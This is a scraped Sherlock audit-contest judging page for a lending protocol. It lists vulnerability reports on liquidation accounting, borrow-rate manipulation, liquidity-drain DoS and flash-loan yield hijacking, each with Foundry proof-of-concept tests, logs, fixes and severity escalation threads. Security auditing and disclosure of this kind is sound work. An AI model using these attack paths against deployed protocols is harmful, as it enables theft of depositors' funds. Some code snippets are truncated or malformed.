Juging Contests
Escalations Open
Sherlock Judging
Juging Contests
Escalations Open
Sherlock Judging
000000, 0xAlix2, 0xc0ffEE, A2-security, BiasedMerc, Honour, JCN, KupiaSec, Nihavent, Obsidian, Tendency, TessKimy, Varun_05, almurhasan, dhank, ether_sky, jah, lemonmon, perseus, rilwan99, stuart_the_minion, trachev, wellbyt3, zarkk01
When performing a liquidation, the borrow rate of the reserve is updated by burnt debt shares instead of the remaining debt shares.
Therefore, according to the amount of the burnt shares in a liquidation, the borrow rate can be significantly decreased.
In the LiquidationLogic::executeLiquidationCall()
function, there is a _repayDebtTokens()
function call to burn covered debt shares through the liquidation.
function executeLiquidationCall( mapping(address => DataTypes.ReserveData) storage reservesData, mapping(uint256 => address) storage reservesList, mapping(address => mapping(bytes32 => DataTypes.PositionBalance)) storage balances, mapping(address => DataTypes.ReserveSupplies) storage totalSupplies, mapping(bytes32 => DataTypes.UserConfigurationMap) storage usersConfig, DataTypes.ExecuteLiquidationCallParams memory params ) external { ... ... _repayDebtTokens(params, vars, balances[params.debtAsset], totalSupplies[params.debtAsset]); ... ... }
In the _repayDebtTokens()
function, nextDebtShares
of debtReserveCache
is updated with burnt shares instead of the remaining debt shares.
function _repayDebtTokens( DataTypes.ExecuteLiquidationCallParams memory params, LiquidationCallLocalVars memory vars, mapping(bytes32 => DataTypes.PositionBalance) storage balances, DataTypes.ReserveSupplies storage totalSupplies ) internal { uint256 burnt = balances[params.position].repayDebt(totalSupplies, vars.actualDebtToLiquidate, vars.debtReserveCache.nextBorrowIndex); vars.debtReserveCache.nextDebtShares = burnt; // <-- Wrong here!!! }
This incorrectly updated debtReserveCache.nextDebtShares
then is used to update the borrow rate in interest rate strategy.
Consequently, we can have conclusion that the less amount of debt is covered when running a liquidation, the lower the borrow rate gets because next borrow rate depends on the amount of burnt debt shares.
Here is a proof test case:
// SPDX-License-Identifier: BUSL-1.1 pragma solidity 0.8.19; import "../../../../lib/forge-std/src/console.sol"; import './PoolSetup.sol'; import {ReserveConfiguration} from './../../../../contracts/core/pool/configuration/ReserveConfiguration.sol'; import {UserConfiguration} from './../../../../contracts/core/pool/configuration/UserConfiguration.sol'; contract PoolLiquidationTest is PoolSetup { using UserConfiguration for DataTypes.UserConfigurationMap; using ReserveConfiguration for DataTypes.ReserveConfigurationMap; using ReserveConfiguration for DataTypes.ReserveData; address alice = address(1); address bob = address(2); uint256 mintAmountA = 1000 ether; uint256 mintAmountB = 2000 ether; uint256 supplyAmountA = 550 ether; uint256 supplyAmountB = 750 ether; uint256 borrowAmountB = 400 ether; function setUp() public { _setUpPool(); pos = keccak256(abi.encodePacked(alice, 'index', uint256(0))); } // @audit-poc function testLiquidationDecreaseBorrowRatePoc() external { oracleA.updateAnswer(100e8); oracleB.updateAnswer(100e8); _mintAndApprove(alice, tokenA, mintAmountA, address(pool)); _mintAndApprove(bob, tokenB, mintAmountB, address(pool)); vm.startPrank(alice); pool.supplySimple(address(tokenA), alice, supplyAmountA, 0); vm.stopPrank(); vm.startPrank(bob); pool.supplySimple(address(tokenB), bob, supplyAmountB, 0); vm.stopPrank(); vm.startPrank(alice); pool.borrowSimple(address(tokenB), alice, borrowAmountB - 1 ether, 0); vm.stopPrank(); // Advance time to make the position unhealthy vm.warp(block.timestamp + 360 days); oracleA.updateAnswer(100e8); oracleB.updateAnswer(100e8); // Expect the position unhealthy vm.startPrank(alice); vm.expectRevert(bytes('HEALTH_FACTOR_LOWER_THAN_LIQUIDATION_THRESHOLD')); pool.borrowSimple(address(tokenB), alice, 1 ether, 0); vm.stopPrank(); // Print log of borrow rate before liquidation pool.forceUpdateReserve(address(tokenB)); DataTypes.ReserveData memory reserveDataB = pool.getReserveData(address(tokenB)); console.log("reserveDataB.borrowRate before:", reserveDataB.borrowRate); vm.startPrank(bob); vm.expectEmit(true, true, true, false); emit PoolEventsLib.LiquidationCall(address(tokenA), address(tokenB), pos, 0, 0, bob); pool.liquidateSimple(address(tokenA), address(tokenB), pos, 0.01 ether); vm.stopPrank(); // Print log of borrow rate after liquidation reserveDataB = pool.getReserveData(address(tokenB)); console.log("reserveDataB.borrowRate after: ", reserveDataB.borrowRate); } }
And logs are:
$ forge test --match-test testLiquidationDecreaseBorrowRatePoc -vvv [⠒] Compiling... [⠊] Compiling 11 files with Solc 0.8.19 [⠒] Solc 0.8.19 finished in 5.89s Compiler run successful! Ran 1 test for test/forge/core/pool/PoolLiquidationPocTests.t.sol:PoolLiquidationTest [PASS] testLiquidationDecreaseBorrowRatePoc() (gas: 1205596) Logs: reserveDataB.borrowRate before: 105094339622641509433962264 reserveDataB.borrowRate after: 4242953968798528786019
A malicious borrower can manipulate the borrow rate of his any unhealthy positions and repay his debt with signficantly low borrow rate.
Manual Review
Should update the nextDebtShares
with totalSupplies.debtShares
function _repayDebtTokens( DataTypes.ExecuteLiquidationCallParams memory params, LiquidationCallLocalVars memory vars, mapping(bytes32 => DataTypes.PositionBalance) storage balances, DataTypes.ReserveSupplies storage totalSupplies ) internal { uint256 burnt = balances[params.position].repayDebt(totalSupplies, vars.actualDebtToLiquidate, vars.debtReserveCache.nextBorrowIndex); - vars.debtReserveCache.nextDebtShares = burnt; + vars.debtReserveCache.nextDebtShares = totalSupplies.debtShares; }
000000, 0xAlix2, 0xc0ffEE, A2-security, Bigsam, Honour, JCN, KupiaSec, Nihavent, Obsidian, TessKimy, Varun_05, almurhasan, coffiasd, dany.armstrong90, dhank, ether_sky, iamnmt, silver_eth, stuart_the_minion, trachev, zarkk01
When a liquidator tries to full liquidation (to cover full debts), there will leave some uncovered debts and the liquidation will wrongly set borrowing status of the debt asset as false.
According to the comment in IPoolSetters.sol
, debtToCover
parameter of the liquidate()
function is intended to be debt assets, not shares.
The caller (liquidator) covers
amount of debt of the user getting liquidated, and receives a proportionally amount of thecollateralAsset
plus a bonus to cover market risk
But the _calculateDebt
function call in the executeLiquidationCall()
do the operations on debt shares to calculate debt amount to cover and collateral amount to buy.
function _calculateDebt( DataTypes.ExecuteLiquidationCallParams memory params, uint256 healthFactor, mapping(address => mapping(bytes32 => DataTypes.PositionBalance)) storage balances ) internal view returns (uint256, uint256) { uint256 userDebt = balances[params.debtAsset][params.position].debtShares; uint256 closeFactor = healthFactor > CLOSE_FACTOR_HF_THRESHOLD ? DEFAULT_LIQUIDATION_CLOSE_FACTOR : MAX_LIQUIDATION_CLOSE_FACTOR; uint256 maxLiquidatableDebt = userDebt.percentMul(closeFactor); uint256 actualDebtToLiquidate = params.debtToCover > maxLiquidatableDebt ? maxLiquidatableDebt : params.debtToCover; return (userDebt, actualDebtToLiquidate); }
According to this function, the return values userDebt
and actualDebtToLiquidate
are debt shares because they are not multiplied by borrow index.
Meanwhile, on the collateral reserve side, the vars.userCollateralBalance
value that is provided as collateral balance to the _calculateAvailableCollateralToLiquidate()
function, is collateral shares not assets. (pool/logic/LiquidationLogic.sol#L136-L148)
vars.userCollateralBalance = balances[params.collateralAsset][params.position].supplyShares; (vars.actualCollateralToLiquidate, vars.actualDebtToLiquidate, vars.liquidationProtocolFeeAmount) = _calculateAvailableCollateralToLiquidate( collateralReserve, vars.debtReserveCache, vars.actualDebtToLiquidate, vars.userCollateralBalance, // @audit-info Supply shares not assets vars.liquidationBonus, IPool(params.pool).getAssetPrice(params.collateralAsset), IPool(params.pool).getAssetPrice(params.debtAsset), IPool(params.pool).factory().liquidationProtocolFeePercentage() );
As there is no shares-to-assets conversion in the _calculateAvailableCollateralToLiquidate()
function, the return values of the function vars.actualCollateralToLiquidate
, vars.actualDebtToLiquidate
, vars.liquidationProtocolFeeAmount
are shares.
The remaining liquidation flow totally treat these share values as asset amounts. e.g. _repayDebtTokens()
function calls the repayDebt
function whose input is supposed to be assets:
function _repayDebtTokens( ... ) internal { uint256 burnt = balances[params.position].repayDebt(totalSupplies, vars.actualDebtToLiquidate, vars.debtReserveCache.nextBorrowIndex); // <-- @audit `vars.actualDebtToLiquidate` is shares at this moment vars.debtReserveCache.nextDebtShares = burnt; }
Thus, when a liquidator tries to cover full debts, the liquidation will leave ((borrowIndex - 1) / borrowIndex) * debtShares
debt shares and will set the borrowing status of the debt asset as false via the following code snippet.
function executeLiquidationCall(...) external { ... ... if (vars.userDebt == vars.actualDebtToLiquidate) { userConfig.setBorrowing(, false); } ... ... }
To make a test case simple, I simplified the oracle price feeds like the below in the CorePoolTests.sol
function _setUpCorePool() internal { ... ... oracleA = new MockV3Aggregator(8, 1e8); - oracleB = new MockV3Aggregator(18, 2 * 1e8); + oracleB = new MockV3Aggregator(8, 1e8); ... ... }
And created a new test file PoolLiquidationTest2.sol
// SPDX-License-Identifier: BUSL-1.1 pragma solidity 0.8.19; import "../../../../lib/forge-std/src/console.sol"; import './PoolSetup.sol'; import {ReserveConfiguration} from './../../../../contracts/core/pool/configuration/ReserveConfiguration.sol'; import {UserConfiguration} from './../../../../contracts/core/pool/configuration/UserConfiguration.sol'; contract PoolLiquidationTest2 is PoolSetup { using UserConfiguration for DataTypes.UserConfigurationMap; using ReserveConfiguration for DataTypes.ReserveConfigurationMap; using ReserveConfiguration for DataTypes.ReserveData; address alice = address(1); address bob = address(2); uint256 mintAmountA = 200 ether; uint256 mintAmountB = 200 ether; uint256 supplyAmountA = 60 ether; uint256 supplyAmountB = 60 ether; uint256 borrowAmountB = 45 ether; function setUp() public { _setUpPool(); pos = keccak256(abi.encodePacked(alice, 'index', uint256(0))); } // @audit-poc function testLiquidationInvalidUnits() external { oracleA.updateAnswer(1e8); oracleB.updateAnswer(1e8); _mintAndApprove(alice, tokenA, mintAmountA, address(pool)); _mintAndApprove(bob, tokenB, mintAmountB, address(pool)); vm.startPrank(alice); pool.supplySimple(address(tokenA), alice, supplyAmountA, 0); vm.stopPrank(); vm.startPrank(bob); pool.supplySimple(address(tokenB), bob, supplyAmountB, 0); vm.stopPrank(); vm.startPrank(alice); pool.borrowSimple(address(tokenB), alice, borrowAmountB, 0); vm.stopPrank(); // Advance time to make the position unhealthy vm.warp(block.timestamp + 360 days); oracleA.updateAnswer(1e8); oracleB.updateAnswer(1e8); // Print log of borrow rate before liquidation pool.forceUpdateReserve(address(tokenB)); DataTypes.ReserveData memory reserveDataB = pool.getReserveData(address(tokenB)); console.log("reserveDataB.borrowIndex before Liq.", reserveDataB.borrowIndex); DataTypes.PositionBalance memory positionBalance = pool.getBalanceRawByPositionId(address(tokenB), pos); console.log('debtShares Before Liq.', positionBalance.debtShares); DataTypes.UserConfigurationMap memory userConfig = pool.getUserConfiguration(alice, 0); console.log('TokenB isBorrowing Before Liq.', UserConfiguration.isBorrowing(userConfig,; vm.startPrank(bob); vm.expectEmit(true, true, true, false); emit PoolEventsLib.LiquidationCall(address(tokenA), address(tokenB), pos, 0, 0, bob); pool.liquidateSimple(address(tokenA), address(tokenB), pos, 100 ether); // @audit Tries to cover full debts vm.stopPrank(); positionBalance = pool.getBalanceRawByPositionId(address(tokenB), pos); console.log('debtShares After Liq.', positionBalance.debtShares); userConfig = pool.getUserConfiguration(alice, 0); console.log('TokenB isBorrowing After Liq.', UserConfiguration.isBorrowing(userConfig,; } }
And here are the logs:
$ forge test --match-test testLiquidationInvalidUnits -vvv [⠒] Compiling... [⠊] Compiling 1 files with Solc 0.8.19 [⠒] Solc 0.8.19 finished in 4.83s Compiler run successful! Ran 1 test for test/forge/core/pool/PoolLiquidationPocTests2.t.sol:PoolLiquidationTest2 [PASS] testLiquidationInvalidUnits() (gas: 1172963) Logs: reserveDataB.borrowIndex before Liq. 1252660064369089319656921640 debtShares Before Liq. 45000000000000000000 TokenB isBorrowing Before Liq. true debtShares After Liq. 9076447170314674990 TokenB isBorrowing After Liq. false
As can be seen from the logs, there are significant amount of debts left but the borrowing flag was set as false.
Wrongly setting borrowing status as false will affect the calculation of total debt amount, LTV and health factor, and this incorrect calculation will affect the whole ecosystem of a pool.
Manual Review
Update the issued lines in the LiquidationLogic.sol
function executeLiquidationCall( ... ... ) external { ... ... - vars.userCollateralBalance = balances[params.collateralAsset][params.position].supplyShares; + vars.userCollateralBalance = balances[params.collateralAsset][params.position].getSupplyBalance(collateralReserve.liquidityIndex); ... ... } function _calculateDebt( ... ... ) internal view returns (uint256, uint256) { - uint256 userDebt = balances[params.debtAsset][params.position].debtShares; + uint256 userDebt = balances[params.debtAsset][params.position].getDebtBalance(borrowIndex); }
I tried the above POC testcase to the update and the logs are:
$ forge test --match-test testLiquidationInvalidUnits -vv [⠒] Compiling... [⠊] Compiling 7 files with Solc 0.8.19 [⠒] Solc 0.8.19 finished in 5.90s Compiler run successful! Ran 1 test for test/forge/core/pool/PoolLiquidationPocTests2.t.sol:PoolLiquidationTest2 [PASS] testLiquidationInvalidUnits() (gas: 1137920) Logs: reserveDataB.borrowIndex before Liq. 1252660064369089319656921640 debtShares Before Liq. 45000000000000000000 TokenB isBorrowing Before Liq. true debtShares After Liq. 0 TokenB isBorrowing After Liq. false
There are two distinct issues that have been grouped into the same issue pool. While the impact is similar, the root causes of the issues are completely different. This categorization is also unfair to the Watsons who reported both issues.
There are two distinct issues that have been grouped into the same issue pool. While the impact is similar, the root causes of the issues are completely different. This categorization is also unfair to the Watsons who reported both issues.
You've created a valid escalation!
To remove the escalation from consideration: Delete your comment.
You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.
Again i agree with @DemoreXTess , These are two different functions,
A fix for A doesn't solve B although the seem similar.
Hence 2 different Root cause, similar impact.
They should be Duplicated into
There are two distinct issues that have been grouped into the same issue pool. While the impact is similar, the root causes of the issues are completely different. This categorization is also unfair to the Watsons who reported both issues.
No, it's unfair for watsons who reported both as one if they are split into 2. The issue caused by a single root cause.
@samuraii77 People who submitted both issues at ones should be the duplicate of both two unique issues. There is nothing wrong about that.
I disagree with the escalation and thought the Lead Judge correctly duplicated them.
The root cause is that the liquidation will be called with wrong values. And those Watsons who correctly judged the root cause would be harmed by a potential separation.
Planning to reject the escalation and leave the issue as is.
@cvetanovv I don't understand. What is your argument for your rejection ? Some of watsons will suffer from that or issues are really same ?
The root cause are completely different. Solving one of those problems doesn't solve the other issue. They are not even in same block scope.
If the reason of rejection is the reports who mentioned both issues, we should also consider the watsons who submitted both issues in separate. There are 2 different high issues and it reduces the worth of submissions significantly which is far worse in this situation.
@cvetanovv If you system doesnt support 1 report 2 duplicate system, we can't do anything for them but it is Watson's responsibility to identify which issue is duplicate of another issue. Those issues are definitely different as I stated above.
@DemoreXTess This is not the main reason.
As I have written, the root cause is that the liquidation will be called with wrong values.
You can also see my comment on your other similar escalation\#issuecomment-2426173895
The same principle is grouped when there are reentrancy vulnerabilities, lack of slippage protection, or unsafe cast. Even if they are different functions and contracts, we duplicate them together.
@cvetanovv Okay, then my escalations are invalid for both. I didn't know that rule in Sherlock. Thank you for clarification.
Has duplicates
Escalations have been resolved successfully!
Escalation status:
A2-security, Flashloan44, Obsidian, almurhasan, zarkk01
Lack of liquidity on collateral asset reserves can cause disruption to liquidation.
The protocol don't have option to disable borrowing or withdrawing in a particular asset reserve for a certain extent to protect the collateral deposits. It can only disable borrowing or freeze the whole reserves but not for specific portion such as collateral deposits. This can be a big problem because someone can always deduct or empty the reserves either by withdrawing their lended assets or borrowing loan. And when the liquidation comes, the collateral can't be paid to liquidator because the asset reserve is already not enough or emptied.
The pool administrator might suggest designating whole asset reserve to be used only for collateral deposit purposes and not for lending and borrowing. However this can be circumvented by malicious users by transferring their collateral to other reserves that accepts borrowing and lending which can eventually led the collateral to be borrowed. This is the nature of multi-asset lending protocol, it allows multiple asset reserves for borrowing and lending as per protocol documentation.
There could be another suggestion to resolve this by only using one asset reserve per pool that offers lending and borrowing but this will already contradict on what the protocol intends to be which is to be a multi-asset lending pool, meaning there are multiple assets offering lending in single pool.
If the protocol intends to do proper multi-asset lending pool platform, it should protect the collateral assets regarding liquidity issues.
Pool creator should setup the pool with more than 2 asset reserves offering lending or borrowing and each of reserves accepts collateral deposits. It allows any of the asset reserves to conduct borrowing to any other asset reserves and vice versa. This is pretty much the purpose and design of the multi-asset lending protocol as per documentation.
No response
This can be considered as attack path or can happen also as normal scenario due to the nature or design of the multi-asset lending protocol. Take note the step 6 can be just a normal happening or deliberate attack to disrupt the liquidation.
This should be high risk since in a typical normal scenario, this vulnerability can happen without so much effort.
The protocol also suffers from bad debt as the loan can't be liquidated.
Modify this test file /zerolend-one/test/forge/core/pool/PoolLiquidationTests.t.sol
and insert the following:
a. in line 16, put address carl = address(3); // add carl as borrower
b. modify this function _generateLiquidationCondition() internal {
_mintAndApprove(alice, tokenA, mintAmountA, address(pool)); // alice 1000 tokenA
_mintAndApprove(bob, tokenB, mintAmountB, address(pool)); // bob 2000 tokenB
_mintAndApprove(carl, tokenB, mintAmountB, address(pool)); // carl 2000 tokenB >>> add this line
pool.supplySimple(address(tokenA), alice, supplyAmountA, 0); // 550 tokenA alice supply
pool.supplySimple(address(tokenB), bob, supplyAmountB, 0); // 750 tokenB bob supply
pool.supplySimple(address(tokenB), carl, supplyAmountB, 0); // 750 tokenB carl supply >>> add this portion
pool.borrowSimple(address(tokenB), alice, borrowAmountB, 0); // 100 tokenB alice borrow
assertEq(tokenB.balanceOf(alice), borrowAmountB);
c. Insert this test
function testLiquidationSimple2() external {
(, uint256 totalDebtBase,,,,) = pool.getUserAccountData(alice, 0);
pool.borrowSimple(address(tokenA), carl, borrowAmountB, 0); // 100 tokenA carl borrow to deduct the reserves in which the collateral is deposited
pool.liquidateSimple(address(tokenA), address(tokenB), pos, 10 ether); // Bob tries to liquidate Alice but will revert
(, uint256 totalDebtBaseNew,,,,) = pool.getUserAccountData(alice, 0);
// Ensure that no liquidation happened and Alice's debt remains the same
assertEq(totalDebtBase, totalDebtBaseNew, "Debt should remain the same after failed liquidation");
2. Run the test forge test -vvvv --match-contract PoolLiquidationTest --match-test testLiquidationSimple2
Each asset reserve should be modified to not allow borrowing or withdrawing for certain collateral deposits. For example, if a particular asset reserve has deposits for collateral, these deposits should not be allowed to be borrowed or withdrew. The rest of the balance of asset reserves will do the lending. At the current design, the pool admin can only make the whole reserve as not enabled for borrowing but not for specific account or amount.
1 comment(s) were left on this issue during the judging contest.
Honour commented:
see #147
This issue should be high severity, it satisfies Sherlock's criteria for high issues
Definite loss of funds without (extensive) limitations of external conditions. The loss of the affected party must exceed 1%.
The attacker can easily delay the liquidation till bad debt accumulates which will be a >1% loss for the lender
Final time to use this
Final time to use this
You've created a valid escalation!
To remove the escalation from consideration: Delete your comment.
You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.
This issue does not qualify as high severity.
The vulnerability arises because the protocol allows collateral to be borrowed, which can lead to temporary liquidation failures due to insufficient liquidity in the pool.
However, for a user to withdraw all the funds from a pool and cause this scenario, he would need a large amount of capital. Even if they succeed in doing so, the DoS on liquidations is only temporary because the borrower must eventually return the borrowed funds, and they will also incur interest costs.
Planning to reject the escalation and leave the issue as is.
and they will also incur interest costs
The interest cost will never need to be paid, because the borrow will not be liquidateable.
he DoS on liquidations is only temporary because the borrower must eventually return the borrowed funds
The DoS on liquidations is not temporary because the borrow will never need to be repaid (because there is no risk of liquidation from accrued interest, because all the collateral is borrowed)
Even if it was temporary, a DoS of liquidations can be weaponised to lead to bad debt, which is >1% profit for the attacker (at the expense of depositors) since their borrowed funds will be worth more than their collateral provided.
Based on the above, it is clearly a high severity issue. It has arised due to forking AAVE but not allowing representative aTokens to be seized, as mentioned in #318:
This is a known issue that aave have mitigated by allowing liquidators to seize ATokens instead of underlying tokens, when there is not enough liquidity in the pools.
To achieve the modularity expected zerolend have tried to simplify the design by removing this core functionality, this however exposes the protocol to the risk of liquidation being blocked if there is not enough liquidity in the pools.
i agree with @cvetanovv
there will always be costs for the attacker, as all assets ltv must be less than 1 so the attacker will have to deposit more in value than they borrow. Combined with their growing interest that, they'll have to either repay the loan + interest to retrieve their initial capital or don't repay and still suffer losses as borrowing is overcollateralized.
This is a temporary DOS at best.
As I explained, it's a DOS of liquidation which directly leads to bad debt when collateral value keeps dropping, where the attacker's borrowed funds is worth more than their collateral, so they steal funds via this DOS
They don't need to repay and collect their collateral as the debt is worth more (due to bad debt)
I will accept the escalation. In theory, a malicious user with very large capital could DoS the liquidation without any constraints, and does not have to return the collateral.
Planning to accept the escalation and make this issue High severity.
Has duplicates
Escalations have been resolved successfully!
Escalation status:
's matured yieldSource:
0xAlix2, 0xc0ffEE, A2-security, JCN, Obsidian, TessKimy, Varun_05, dhank, ether_sky, iamnmt, trachev, zarkk01
does not update pool's liquidityIndex
at the beginning will cause the matured yield to be distributed to users that do not supply to the vault before the yield accrues. An attacker can exploit this to hijack the CuratedVault
's matured yield.
does not update pool's liquidityIndex
at the beginning
function totalAssets() public view override returns (uint256 assets) { for (uint256 i; i < withdrawQueue.length; ++i) { assets += withdrawQueue[i].getBalanceByPosition(asset(), positionId); } }
No response
No response
Let's have:
amount of yield is accrued from T1
to T2
at T2
to the vault. Since CuratedVault#totalAssets
does not update pool's liquidityIndex
, the minted shares are calculated based on the total assets at T1
amount of yield.The cost of this attack is gas fee and flash loan fee.
The attacker hijacks flashLoanAmount / (flashLoanAmount + totalAssets)
percentage of X
amount of yield.
could be a considerable amount when:
T2 - T1
is large. This is the case for the pool with low interactions.When X
is a considerable amount, the amount of hijacked funds could be greater than the cost of the attack, then the attacker will benefit from the attack.
Due to a bug in PositionBalanceConfiguration#getSupplyBalance
that we submitted in a different issue, fix the getSupplyBalance
function before running the PoC
library PositionBalanceConfiguration { function getSupplyBalance(DataTypes.PositionBalance storage self, uint256 index) public view returns (uint256 supply) { - uint256 increase = self.supplyShares.rayMul(index) - self.supplyShares.rayMul(self.lastSupplyLiquidtyIndex); - return self.supplyShares + increase; + return self.supplyShares.rayMul(index); } }
Run command: forge test --match-path test/PoC/PoC.t.sol
// SPDX-License-Identifier: MIT pragma solidity ^0.8.0; import {console} from 'lib/forge-std/src/Test.sol'; import '../forge/core/vaults/helpers/IntegrationVaultTest.sol'; contract ERC4626Test is IntegrationVaultTest { address attacker = makeAddr('attacker'); function setUp() public { _setUpVault(); _setCap(allMarkets[0], CAP); _sortSupplyQueueIdleLast(); oracleB.updateRoundTimestamp(); oracle.updateRoundTimestamp(); uint256 vaultAssets = 10 ether;, vaultAssets); vm.prank(supplier); vault.deposit(vaultAssets, supplier); vm.prank(attacker); loanToken.approve(address(vault), type(uint256).max); } function testDeposit() public {, type(uint128).max); vm.startPrank(borrower); allMarkets[0].supplySimple(address(collateralToken), borrower, type(uint128).max, 0); allMarkets[0].borrowSimple(address(loanToken), borrower, 8 ether, 0); skip(100 days); oracleB.updateRoundTimestamp(); oracle.updateRoundTimestamp(); uint256 vaultAssetsBefore = vault.totalAssets(); console.log("Vault's assets before updating reserve: %e", vaultAssetsBefore); uint256 snapshot = vm.snapshot(); allMarkets[0].forceUpdateReserve(address(loanToken)); console.log("Vault's accrued yield: %e", vault.totalAssets() - vaultAssetsBefore); vm.revertTo(snapshot); uint256 flashLoanAmount = 100 ether;, flashLoanAmount); vm.startPrank(attacker); uint256 shares = vault.deposit(flashLoanAmount, attacker); vault.redeem(shares, attacker, attacker); vm.stopPrank(); console.log("Attacker's profit: %e", loanToken.balanceOf(attacker) - flashLoanAmount); } }
Vault's assets before updating reserve: 1e19 Vault's accrued yield: 5.62832773326440941e17 Attacker's profit: 5.11666157569491763e17
Although the yield accrued, the vault's assets before updating reserve is still 1e19
Update pool's liquidityIndex
at the beginning of CuratedVault#totalAssets
function totalAssets() public view override returns (uint256 assets) { for (uint256 i; i < withdrawQueue.length; ++i) { + withdrawQueue[i].forceUpdateReserve(asset()); assets += withdrawQueue[i].getBalanceByPosition(asset(), positionId); } }
This should be classified as high severity. Due to the outdated totalAssets, all actions that rely on totalAssets, such as supplying assets, will result in a loss of funds. The minted shares will be incorrect whenever a user supplies assets to the vault. This not only exposes the protocol to flash loan attacks but also causes a direct loss of funds for users. Therefore, the severity of the issue should be high.
This should be classified as high severity. Due to the outdated totalAssets, all actions that rely on totalAssets, such as supplying assets, will result in a loss of funds. The minted shares will be incorrect whenever a user supplies assets to the vault. This not only exposes the protocol to flash loan attacks but also causes a direct loss of funds for users. Therefore, the severity of the issue should be high.
You've created a valid escalation!
To remove the escalation from consideration: Delete your comment.
You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.
I agree that this issue meets the requirements for High severity:
Definite loss of funds without (extensive) limitations of external conditions. The loss of the affected party must exceed 1%.
Due to the stale totalAssets
data, all actions that depend on this function can result in user losses without requiring any external conditions to be met.
Planning to accept the escalation and make this issue High severity.
Has duplicates
Escalations have been resolved successfully!
Escalation status:
does not account for liquidation fees when withdrawing collateral during liquidation leading to incorrect accounting and Pools insolvencySource:
000000, A2-security, Bigsam, Honour, dhank, ether_sky, imsrybr0, lemonmon, thisvishalsingh, trachev, zarkk01
does not account for liquidation fees when withdrawing collateral during liquidation leading to incorrect accounting and Pools insolvency, ultimately impacting regular flows (.e.g borrows, withdrawals, redemptions, ...) in the protocol for the different actors (.i.e Pools users, Curated Vaults and their users, NFT Positions users).
// ... library LiquidationLogic { // ... function executeLiquidationCall( mapping(address => DataTypes.ReserveData) storage reservesData, mapping(uint256 => address) storage reservesList, mapping(address => mapping(bytes32 => DataTypes.PositionBalance)) storage balances, mapping(address => DataTypes.ReserveSupplies) storage totalSupplies, mapping(bytes32 => DataTypes.UserConfigurationMap) storage usersConfig, DataTypes.ExecuteLiquidationCallParams memory params ) external { // ... (vars.actualCollateralToLiquidate, vars.actualDebtToLiquidate, vars.liquidationProtocolFeeAmount) = // <==== Audit _calculateAvailableCollateralToLiquidate( collateralReserve, vars.debtReserveCache, vars.actualDebtToLiquidate, vars.userCollateralBalance, vars.liquidationBonus, IPool(params.pool).getAssetPrice(params.collateralAsset), IPool(params.pool).getAssetPrice(params.debtAsset), IPool(params.pool).factory().liquidationProtocolFeePercentage() ); // ... _burnCollateralTokens( collateralReserve, params, vars, balances[params.collateralAsset][params.position], totalSupplies[params.collateralAsset] ); // <==== Audit if (vars.liquidationProtocolFeeAmount != 0) { // ... IERC20(params.collateralAsset).safeTransfer(IPool(params.pool).factory().treasury(), vars.liquidationProtocolFeeAmount); // <==== Audit } // ... } function _burnCollateralTokens( DataTypes.ReserveData storage collateralReserve, DataTypes.ExecuteLiquidationCallParams memory params, LiquidationCallLocalVars memory vars, DataTypes.PositionBalance storage balances, DataTypes.ReserveSupplies storage totalSupplies ) internal { // ... balances.withdrawCollateral(totalSupplies, vars.actualCollateralToLiquidate, collateralReserveCache.nextLiquidityIndex); // <==== Audit : actualCollateralToLiquidate doesn't include liquidation fees IERC20(params.collateralAsset).safeTransfer(msg.sender, vars.actualCollateralToLiquidate); } // ... function _calculateAvailableCollateralToLiquidate( DataTypes.ReserveData storage collateralReserve, DataTypes.ReserveCache memory debtReserveCache, uint256 debtToCover, uint256 userCollateralBalance, uint256 liquidationBonus, uint256 collateralPrice, uint256 debtAssetPrice, uint256 liquidationProtocolFeePercentage ) internal view returns (uint256, uint256, uint256) { // ... if (liquidationProtocolFeePercentage != 0) { vars.bonusCollateral = vars.collateralAmount - vars.collateralAmount.percentDiv(liquidationBonus); vars.liquidationProtocolFee = vars.bonusCollateral.percentMul(liquidationProtocolFeePercentage); return (vars.collateralAmount - vars.liquidationProtocolFee, vars.debtAmountNeeded, vars.liquidationProtocolFee); // <==== Audit } else { return (vars.collateralAmount, vars.debtAmountNeeded, 0); } } }
function withdrawCollateral( DataTypes.PositionBalance storage self, DataTypes.ReserveSupplies storage supply, uint256 amount, uint128 index ) internal returns (uint256 sharesBurnt) { sharesBurnt = amount.rayDiv(index); require(sharesBurnt != 0, PoolErrorsLib.INVALID_BURN_AMOUNT); self.lastSupplyLiquidtyIndex = index; self.supplyShares -= sharesBurnt; // <==== Audit supply.supplyShares -= sharesBurnt; // <==== Audit }
When there are protocol liquidation fees, _burnCollateralTokens
doesn't account for liquidation fees when withrawing the collateral, leading to the pool and actor having more supply shares than reality.
Protocol liquidations fees are set.
Not an attack path per say as this happens in every liquidation when there are liquidation fees.
function testLiquidationWithFees() external { poolFactory.setLiquidationProtcolFeePercentage(0.05e4); _mintAndApprove(alice, tokenA, 3000 ether, address(pool)); _mintAndApprove(bob, tokenB, 5000 ether, address(pool)); vm.startPrank(bob); pool.supplySimple(address(tokenB), bob, 3000 ether, 0); vm.stopPrank(); vm.startPrank(alice); pool.supplySimple(address(tokenA), alice, 1000 ether, 0); pool.borrowSimple(address(tokenB), alice, 375 ether, 0); vm.stopPrank(); oracleB.updateAnswer(2.5e8); vm.prank(bob); pool.liquidateSimple(address(tokenA), address(tokenB), pos, type(uint256).max); assertEq(pool.getBalance(address(tokenA), alice, 0), tokenA.balanceOf(address(pool))); }
forge test --match-test testLiquidationWithFees [⠢] Compiling... No files changed, compilation skipped Ran 1 test for test/forge/core/pool/PoolLiquidationTests.t.sol:PoolLiquidationTest [FAIL. Reason: assertion failed: 17968750000000000000 != 15625000000000000000] testLiquidationWithFees() (gas: 1003975) Suite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 5.25ms (1.62ms CPU time) Ran 1 test suite in 347.96ms (5.25ms CPU time): 0 tests passed, 1 failed, 0 skipped (1 total tests) Failing tests: Encountered 1 failing test in test/forge/core/pool/PoolLiquidationTests.t.sol:PoolLiquidationTest [FAIL. Reason: assertion failed: 17968750000000000000 != 15625000000000000000] testLiquidationWithFees() (gas: 1003975) Encountered a total of 1 failing tests, 0 tests succeeded
